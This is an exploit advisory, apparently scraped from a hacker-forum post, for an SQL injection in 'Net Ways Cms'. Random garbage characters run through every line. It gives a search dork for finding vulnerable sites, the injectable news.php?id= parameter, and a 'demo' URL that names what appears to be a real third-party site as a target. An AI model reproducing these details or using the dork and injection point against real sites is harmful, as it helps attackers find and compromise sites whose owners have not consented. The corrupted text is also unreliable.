################################################################################??########
; q* t* S. i, G$ |' @6 R' {# 4 k; g* v v; n; s3 k: [
# Exploit Title : Net Ways Cms Sql Injection Vulnerability % y* @1 H, W1 F: L* G' L1 G
#
9 r% ]) ^! i: ~# Author : IrIsT.Ir ! ], _" s( Q2 Q! p$ V
# 5 h" K6 j4 Z- Z3 C6 o
# Discovered By : Am!r / V% i3 Z: y1 ]' v6 M7 Z3 d
#
* h; d1 U( _& X3 G( r2 k! i# Home : http://IrIsT.Ir/forum
# `" Y/ {% F, F1 U. g# 4 K; w1 x N7 W+ g5 }" y( t/ N6 l
# Software Link : http://www.netways.com/ www.political-security.com
' g6 h; w9 o1 A9 W. R#
# f' J4 K. |0 {' b; a# Security Risk : High
/ d4 e o; l+ D) e; I# 6 W+ r. r" l9 v6 K" ?4 `3 L: K
# Version : All Version
0 p0 f, W! q3 D5 q' d0 d#
6 K3 ]$ K$ C' K* X# Tested on : GNU/Linux Ubuntu - Windows Server - win7 : r; G: y s) l, M3 F/ [
#
|7 N. J6 w5 T% Q' X( I& Y# Dork : intext:"Designed & developed by NetWays" , P* F3 n$ t, f- Z+ W. z
#
/ x( K }( Y1 S. Z ]3 d! M################################################################################??########
+ U n% s' T0 d4 M5 p# / V( c" p- q; x0 C0 S. _
# Expl0iTs : - C1 i% ?9 ~1 U9 M( J5 @( ]7 c
# # }* S) u; s" k
# http://target.com/news.php?id=[Sql]
6 ~& ^$ T* m) ?* E# e% D$ Y: N# g# # E- D* j2 Q M+ V$ r/ m
# ; v, s0 b: a: ~7 b! o, |2 v
# D3mo :
* E/ N$ r! n8 N( d) ?# r0 ]#
2 w1 b3 _2 ^. A% B# http://compagnieparento.com/news.php?id=7[Sql]
2 Z7 u% r( s1 N! O" D9 O8 @( s# , _1 g! `7 X1 V; L% B7 p! V( L
################################################################################??########
5 G3 n4 v0 s; a#
/ z, T! `8 r; p5 z% S# Greats : B3HZ4D - nimaarek - Dead.Zone - C0dex - SpooferNinja - TaK.FaNaR - Nafsh - BestC0d3r 4 \) e4 [( ^3 q: i2 J0 V( o! L; [1 m
# - E3 N3 {8 t- f+ k
# 0x0ptim0us - TaK.FaNaR - m3hdi - F@rid - Siamak.Black - H4x0r - dr.tofan - skote_vahshat - d3c0d3r
: t/ M5 s% Q6 u3 g2 R9 k# ]9 }#
3 e. w; G ?- B& ?' U) {0 @# Mr.Xpr & M.R.S.CO & Mr.Cicili & H-SK33PY & All Members In Www.IrIsT.Ir/forum
1 T' }0 \7 Q0 F$ u#
7 R5 Q3 m: r7 ]3 @################################################################################??######## |